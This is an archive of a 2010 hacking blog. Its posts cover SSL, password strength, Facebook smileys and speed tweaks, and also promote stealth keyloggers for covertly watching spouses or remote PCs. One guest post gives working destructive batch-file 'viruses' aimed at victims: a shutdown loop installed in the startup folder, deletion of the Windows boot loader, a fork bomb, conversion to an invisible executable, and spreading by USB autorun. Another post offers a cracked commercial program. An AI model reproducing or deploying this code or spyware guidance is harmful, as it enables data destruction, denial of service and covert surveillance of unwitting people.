Saturday, October 30, 2010

What others are saying about My Book?

                                  
A few weeks back I told you about my book on Ethical Hacking which was launched on 15th of august. I have had lots of sales and also have received the feedback from the readers and webmasters which have read it, so I though you to share the testimonials with you.
Below are Few of the Testimonials I have received so far:


    

    

I will be updating this page frequently as soon as I receive new Testimonials, If you are a Beginner and would like to know How Hackers Hack computer systems, Networks, Facebook ,Orkut or Gmail accounts etc so I suggest you reading my book "A Beginners Guide To Ethical Hacking"

Monday, October 25, 2010

A major flaw in Mcafee URL shortner

Image and video hosting by TinyPic
Mcafee claims its products to be top and most popular security product, Today I heard about Mcafee url shorting service, As I visited the Mcafee Url shortning website, I found that they claimed that their url shortner is safe and secure.

Image and video hosting by TinyPic

So I thought to test it, I created a Facebook fake login page and tried to shorten it with Mcafee url shortner, hoping that it was detect it and will not allow to shorten it, but I was shocked to see that Mcafee actually showed that the website is safe, see the image below:


Image and video hosting by TinyPicAs lots of people trust on mcafee and a hacker could take an advantage of Mcafee Url shortning service and steal thousands of email accounts, this shows that one should not always rely on softwares for security, 


Hope Mcafee fix this very soon 

Saturday, October 23, 2010

Which spyware keylogger software to choose?

Photobucket
I continue the series of providing you with information of best spware keylogger softwares availible online.In this post i will tell you about all the best spyware products availible for various purposes.Today there exists many of spyware keylogger softwares because a lot of people want to monitor the activities of their children, spouse, friends etc.Most of people try to find thier crack version or serial key and end them self in infecting their PC  with Viruses.Most of people are confused with selection b/w Spyware keylogger software,so today the Title of my post is "Which spyware keylogger software to choose?"

What exactly is a Monitoring Software and how can it help me ?

A computer monitoring software is just like any other software (program) which when installed, secretly monitors each and every activity that takes place on the computer. The activities such as web browsing, chatting, gaming etc. are all recorded and saved. These monitoring softwares can record each and every keystroke. So it is possible to capture usernames and passwords very easily with minimum effort. Monitoring softwares are also commonly known as Keyloggers.

How can i install a spyware keylogger software?
 
Installing a spyware keylogger software is very simple,even a person with basic knowledge of computer can use and monitor each and every activity that takes place on the computer.You need to setup a secret password and hotkey combination which is required later to see the recorded data ( logs). After the installation is complete the software goes invisible,once the software gets installed it will sent you recorded data(logs) and screen shots of the activities that takes place on your computer.

Which spyware keylogger software to choose?


There exists different flavours of these softwares and you have to choose the one that best match your needs. Here is a list of some of the best monitoring programs that I recommend.


For monitoring your own PC:

If you want to monitor your own PC you can i recommend the following spyware software:

Spyagent:


Spytech SpyAgent is our award winning, powerful computer spy software that allows you to monitor EVERYTHING users do on your computer - in total stealth. SpyAgent provides a large array of essential computer monitoring features
Click here to goto official website of spyagent


Keystroke spy:

Keystroke Spy is a powerful tool that can log every keystroke users type and capture screenshots of their activities. Keystroke Spy can run in total stealth, email you when specific keywords are typed, and can even be set to only log keystrokes typed in specific applications. With Keystroke Spy you will be able to log websites users visit, emails they send, passwords they use, applications they interact with, typed documents, and see everything they did with visual screenshot playback!



For monitoring a Remote PC:

If you want to monitor a Remote PC then the following softwares are Recommended:

Sniperspy:
 
SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.

Friday, October 22, 2010

How to catch a cheating spouse? - Catch a Cheater


Are you curious to know if your wife or your husband is cheating on you, Some studies reveal that:


  • Only 46% of men believe that online affairs are adultery. (DivorceMag)
  • Up to 37% of men and 22% of women admit to having affairs. Researchers think the vast majority of the millions of people who visit chat rooms, have multiple "special friends". (Dr. Bob Lanier, askbob.com)
  •  One-third of divorce litigation is caused by online affairs. (The Fortino Group)
  •  Approximately 70% of time on-line is spent in chatrooms or sending e-mail; of these interactions, the vast majority are romantic in nature. (Dr. Michael Adamse, PhD., co-author of "Affairs of the Net: The Cybershrinks' Guide to Online Relationships")

How to catch cheating spouse is an ebook which will guide you step by step to catch a cheating spouse, With How to catch a cheating spouse its a cake walk for you to catch a cheating spouse. Whether your partner has just started having an affair, been having an affair for a while, or just ended an affair, it doesn’t matter. I’ll show you how to get the solid evidence you need that will leave no room for excuses or alibis.

Bonuses

You will get the following Bonuses along with this book:




So what are you waiting for Grab your hands on Spouse catching Book and know if you your partner is cheating on your, For download links visit the link below:
Spouse Catching book

Thursday, October 21, 2010

How to create Batch file viruses?

What are Batch Files ?

According to wikipedia a batch file is a text file containing a series of commands intended to be executed by the command interprete, In this article I will be telling you the basics of batch files clear and developing the approach towards coding your own viruses. Lets begin with a simple example ,


Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one

1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'



We first make a folder/directory 'x', then enter in folder 'x',then make a folder 'y' in folder 'x' .
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat




Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we run the batch file

So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.

What can batch viruses do ?

They can be used to delete the windows files, format data, steal information,consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.

Now lets start with simple codes,

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.


1.


:x
start cmd.exe
goto x // infinite loop

This code will be opening command prompt screen infinite times , irritating victim and affecting performance.


2.  copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts .


Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

3. Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.



Lets make a batch file to  delete this file from victim's computer and the windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del C:\ntldr //delete ntldr file

After ruuning this batch file , system will not reboot and a normal victim would definitely install the windows again. 




4.%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows This is actually known as 'fork bomb'.



The viruses we just coded -: 




 


Note : Most of the batch viruses are simply undetectable by any anitiviruses
 
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses -:

1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations,we need to convert these batch files into executable files that is exe files.


Download this Batch To Exe coverter from here.
http://www.mediafire.com/?uhsc5tfkd5dbn65

 
After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.



 


You can use other options as per your requirement.

Spreading batch viruses through pen drive -:


Step 1. 

 
Open notepad and write 



[autorun]
open=anything.bat
Icon=anything.ico

Save file as ‘autorun.inf


Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.



About The Author

This is a guest post written by Aneesh M Makker. Aneesh M.Makker is an Ethical hacker from Malout, a town in Punjab.Click here to visit his Facebook Profile

Monday, October 18, 2010

What is Secure Sockets Layer (SSL)?

You might have heard some times that not to give your password or credit card information or any other sensitive information on public computers or on Msn, yahoo etc chats.The reason why you might have heard that the Hackers have some ways to you would have probably heard that hackers have a way to steal your your credit card numbers , passwords etc.
A hacker can use different types of attacks such as Packet sniffing or ARP Poisoning to steal your sensitive information

Secure Sockets Layer (SSL) is the most widely used technology for creating a secure communication between the web client and the web server. You must be familiar with http:// protocol and https:// protocol, You might be wondering what they mean. HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a secure communication.

Cryptography


If two users want to have a secure communication they can also use cryptography to accomplish it

For example:

TFDVSF=Encrypted Text

SECURE= Decrypted Text

You might be wondering how i Decrypted it, Here i have used Algorithm=+ for the communication and the key is "1", What comes after S is T so as you can see that S is converted into T, What comes After E is F to letter E from the word secure if converted into F and so on, To help you understand this more better I am adding a Video



So If the hacker starts sniffing from between he will get Encrypted text and as the Hacker does not know the keys so he cant decrypt it, but if the attacker or hacker is sniffing from the starting point so he will get the key and can easily Decrypt the data

Standard Communication VS Secure communication

Suppose there exists two communication parties A (client) and B (server)

Standard communication(HTTP)


When A will send information to B it will be in unencrypted manner, this is acceptable if A is not sharing Confidential information, but if A is sending sensitive information say "Password" it will also be in unencrypted form, If a hacker starts sniffing the communication so he will get the password.This scenario is illustrated using the following figure




Secure communication(HTTPS)

In a secure communication i.e. HTTPS the conversation between A and B happens to be in a safe tunnel, The information which a user A sends to B will be in encrypted form so even if a hacker gets unauthorized access to the conversion he will receive the encrypted password (“xz54p6kd“) and not the original password.This scenario is illustrated using the following figure



How is HTTPS implemented?

A HTTPS protocol can be implemented by using Secure Sockets Layer (SSL), A website can implement HTTPS by purchasing SSL certificate.

Which websites need SSL Certificate?

The websites where a private conversation is occurred, Websites related to online transactions or other sensitive information needs to be protected needs to SSL Certificate

How to identify a Secure Connection?

In Internet Explorer and google chrome, you will see a lock icon Picture of the Lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website.

If you are making an online transaction through Credit card or any other means you should check if https:// secured communication is enabled.

Sunday, October 17, 2010

How to play Counter Strike 1.6 online for free

Counter strike is the #1 online action game in the world, and CS 1.6 its most popular version, I was mad at counter strike few years back , but for now it has been more than one year since I haven't played it for last 1 year as I have no time for it.

Counter strike 1.6 can be played online for free, the only requirement is that you should have a fast Internet connection or else you will not enjoy playing it will hang every few seconds, There are tons of methods to play Counter strike 1.6 online for free but I am writing a method which is very easy to implement and also very user friendly


How to play Counter Strike 1.6 online(Method)

1.First of all install counter strike 1.6 on your computer

2.Next you need to have list of cs1.6 free public servers on which you can play, One of the sites where you can find List of CS 1.6 Free public servers is:

http://www.gametracker.com/search/cs/


4..Start your cs 1.6 game


5.Go to find server,then goto favorite

6.Right click there and select add server by ip Address 

7.Now paste the server ip address which you have copied.

In the similar manner you can add more Servers to your game to play online, There are tons of free CS 1.6 servers available where you can play Counter Strike 1.6 Online for free

Also Read

Counter Strike 1.6 Aimbot – CS 1.6 Wallhack Cheats Download
CS 1.6 Aimbot hack – Counter strike cheats

Thursday, October 14, 2010

How To Create Strong Passwords?

As you know that passwords are the only form of security available now a days, Its really important for one to create a strong passwords,
Keeping a weak passwords can make you vulnerable to attacks such as Brute force, Dictionary attacks, Rainbow Tables etc.
So in this article I will tell you to create a strong password so you can secure your account from getting hacked

What makes a strong password?


A password can be considered strong if it contains following things:
  • It needs to contain special characters such as @#$%^&
  • It must be at least 8 characters long.
  • It must not have any common words such as 123, password, your birth date, your login name and any words that can be found in the dictionary,(This will prevent you from getting hacked by a Dictionary Attack)
  • a variation of capitalization and small letters
Alternatively there is a website named www.strongpasswordgenerator.com which automatically generates a strong password for you, The website allows you to choose a password length and also gives you hints through which you can easily memorize the password


Hope you liked the post ! Pass the comments

    Tuesday, October 12, 2010

    Facebook Chat Smileys

    Facebook is the most widely used Social Networking website in the world having the most advanced features, but instead of having so many features most people are not able to use it or they don’t know to use ,There are lots of smileys in Facebook chat but lots of people dont know about it, You can you smileys in Facebook chat and increase your Chatting experience,
    below I am placing a chart which will contain smileys in Facebook chat along with their code

     

    Facebook smiley chart

    You can also use bold fonts or underlined fonts in facebook chat. To use bold fonts type your message between two asterisks.
    e.g. *message*
    To type underlined messages type your message between two underscores.
    e.g. _message_
    If you know some more Smileys in Facebook chat kindly share through commenting.

    Also Read:
    Facebook Chat Smiley Charts

    Mac Security Software - Secure Mac OS

    The area of Mac security software is fairly broad to Mac users. The primary aspects of security software for the Mac are antivirus programs, patches and updates for the Mac OS X, and updates from commonly used applications such as web browser Safari, Adobe Shockwave, and Google Chrome.

    In general, Mac users should be kept up-to-date on security fixes for all of the listed primary items above. Applying fixes will be automatic in the case of a program like Google Chrome while the Adobe Shockwave product will inform you of updates so long as you are connected to the Internet.
    Security vulnerabilities can reach in to Mac email applications as well to where you have what are known as botnets putting out spam email messages using your Mac. That is why you want an antivirus program that is robust and will provide you with security monitoring for emails as well as your hard disk and web site usage. Along with that, it is important to stay current on the latest Mac OS X fixes that apply to your operating system. Checking with Apple's website to ensure your current with security fixes is a good way to confirm the facts. There are also web blogs particular to Mac users that will indicate the latest Mac security software issues and fixes for widely-used products such as Safari.

    Antivirus programs are plentiful for the latest Mac OS X versions in use. It becomes harder to find support for antivirus software on older Mac OS X versions. Be aware of end-of-life software so that you are not caught short when it comes to security. The latest trojan horse viruses that are attacking Mac users are also a good thing to be aware of even if you have solid antivirus program software.

    Computer security is a big issue and is constantly playing catch up to those who exploit operating systems flaws, browser code weaknesses, and application program security flaws. Security flaws also exist in such ancillary programs the Mac uses such as Java. Java is used heavily for web-based communications and applications. Exploitations of Java can lead to corruption of your local system hard disk and data files.

    To avoid suffering the maladies of a compromised Mac computer system, always stay on top of the latest Mac security software fixes and visit trusted web sites while quickly aborting any unfamiliar web site to you that you were referred to or found wherein you see a lot of pop up advertising and free software checks of your Mac hard disk or statements about your Mac may be infected.

    For those Mac users that also run a Windows volume or partition, it is wise to have an equally running antivirus program on the Windows side. There are viruses that will go between both the Windows and Mac sides of your Mac computer. In fact, MS Office products that use visual basic along with macro commands are notorious for impacts from malware and trojans.

    The use of a robust antivirus program that will monitor both your Windows and Mac volumes, folders and files is that way to go.

    Monday, October 11, 2010

    How to detect Anonymous IP Address?

    Proxies are easiest ways to hide your Identity, However Proxy's are mostly used by fraudsters, scammers and hackers to hide their Identity while committing cyber crimes and therefore in this article I will tell you how to detect those Anonymous IP address

    Following are some of the examples where fraudsters use the proxies to hide their actual IP.

     Credit Card Frauds

    Anonymous IP's are used for credit card frauds,such as cashing out the stolen credit card numbers and stealing the money, When ever a transaction is done from a credit card, the IP address of the computer from where the transaction is made is captured by the Credit card providers, So if the hacker or Fraudster is cashing out from his original location, he will be easily be traced.
    So to avoid it the Hacker or Fraudster would use a proxy in order to hide his original location and the spoofed IP will be captured by the Credit card providers

    Bypassing Restriction

    In most offices or schools websites like Facebook, orkut etc and other websites are blocked so people use proxy to bypass the restrictions and unlock the websites

    Accessing hacked accounts

    In Email service providers like gmail you can find the real IP Address from which you accessed the accounts previously, Say if a hacker has hacked some one's Gmail account and he is monitoring the hacked account, If he will login without a proxy, his real IP will be captured and therefore he will be traced

    Proxy Detection Servies

    Now a days proxy detection has became a critical component, There some services like Fraud labs and Free Proxy Detector to detect the usage of proxy or spoofed IP from users participating online

    How Proxy Detection works?

    Proxy detection services mostly rely on IP addresses to determine whether or not the IP is a proxy, they keep a record of the IP's which most proxy's use as a Spoofed IP and therefore by comparing the IP with the list of flagged IP's they could find that the IP is a proxy or not, If the IP is not on the list then it is authenticated and the confirmation is sent back to the merchant. Otherwise it is reported to be a suspected proxy.

    Hope you liked the post ! Please Pass the comments

    Saturday, October 9, 2010

    How to use smileys in Facebook chat?

    Facebook is the most popular social networking site in the world with an alexa rank of just #2, Recently I have been receiving many emails and I am constantly asked about smileys in Facebook chat, There are lots of smileys in Facebook chat but lots of people dont know about it, You can you smileys in Facebook chat and increase your Chatting experience, Below I am placing 2 charts which will contain smileys in Facebook chat along with their code




    Hope you liked the collection of Facebook chat smileys, Feel free to ask by commenting!

    Also Read:
    How to use Bold Underlined Fonts and emoticons Smileys in Facebook Chat?

    Friday, October 8, 2010

    How to increase your internet speed

    Increase internet speed

    The following post is on will tell you some methods to increase your internet speed,I will show you some ways to increase your net and browser speed

    Go to Start>>Run and then type in “gpedit.msc” without the quotes (“)

    Computer Configuration -> Administrative Templates -> Network -> QoS Packet Scheduler.
    after that, you should see something like “Limit Reservable Bandwidth”. Modify that and set it to “Disabled”, or you can put it to “Enabled” and change the value to 0.

    Now this will increase your internet speed by 20%


    Increase internet speed - method 2

    Below combination will speed up your surfing on the net. it is amazingly fast.

    Firefox + IDM + TCP Optimizer


    kindly do a speed test of your net connection before & after at http://speedtest.net to know what difference this software has made.

    1) Speed Up the Firefox.


    Just do the following steps:


    *
    Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:

    network.http.pipelining
    network.http.proxy.pipelining
    network.http.pipelining.maxrequests

    * Alter the entries do as follows:

    Set "network.http.pipelining" to "true"

    Set "network.http.proxy.pipelining" to "true"

    Set "network.http.pipelining.maxrequests" to some number like 30.

    * Lastly right-click anywhere and select New-> Integer.
    Name it "nglayout.initialpaint.delay" and set its value to "0".


    Method 3

    Now Download & Install IDM. ( The Best Download Manager I've ever used. )

    CLick here to download

    TCP OPTIMIZER DOWNLOAD

    When u open TCP Optimizer, dont do anything, just select the option 'Optimal Settings' & apply the changes.
    In the next box, press OK and reboot.

    I have given several methods to speed up your internet ,Go ahead and try and see the magic

    Tuesday, October 5, 2010

    How to protect your computer from keyloggers?

    Keyloggers have been a major problem today as once they get installed in your computer the hacker can get almost any information, I have written couple of posts on keylogging and reviewed some of the best keyloggers available now a days
    The program which are specially used to detect and protect your computers from keyloggers are Antiloggers, I have tested lots of Antiloggers and found Zemana Antilogger only which is capable of detecting almost every keylogger.
    Normally a keylogger is detected by a good antivirus or Antispyware program, but hackers use some methods such as crypting, hexing, binding etc through which the keylogger can easily Antivirus as well as Antispyware program

    Zemana AntiLogger now covers pretty much every aspect of Windows including registry modification and dll injection prevention and protects Windows from other spyware-related techniques with Anti-Keylogger, Anti-SreeenLogger, Anti-WebLogger and Anti-ClipboardLogger tools of its own. Another useful feature this apps has is while-list approach (in contrast to Anti-Virus blacklist approach) meaning it automatically recognizes "safe" programs and does not treat them as "suspects"
    For more information on this program and download details visit the following link
    Zemana Antilogger Download

    Here are some of the articles I have written on keylogging from the past:

    Sniperspy Keylogger for Mac OS Launched
    How to use sniperspy to hack passwords
    Hack Facebook password using Winspy keylogger
    Remote Password spying softwares
    Abobo keylogger for Mac OS
    All spy keylogger - The complete review

    Friday, October 1, 2010

    How to trace an email

    In my previous post I wrote on How to trace a sender in gmail, however the method was a bit complicated and lots of users were not able to understand, In this article I will tell you to use a great peice of software Email Tracker pro to trace an email, Email tracker pro can trace and track email back to the senders location. Stop SPAM email and phishing email with email tracker pro. The latest version of Email tracker pro is V9, however the program is not free and you will not find many working serials on the web, So I use Email tracker pro v8 for demonstration as I am already placing its crack below:


    Trace an Email using emailtrackerpro

    Follow the steps below to use Email tracker pro v8 to trace an Email

    1.First of all download Email tracker pro v8 and install it on your computer

    2. Open Email tracker pro and click on Trace an email



    3. Now you need to paste the Email headers in it, For Gmail I have already demonstrated on how to get Gmail headers in my previous post How to trace a sender in Gmail?, but if you want to trace a hotmail, yahoo or any other email and you are not sure how to get email headers kindly google it




    4. Once you click on trace button, it will start tracing and will show you the appropriate location of the email sender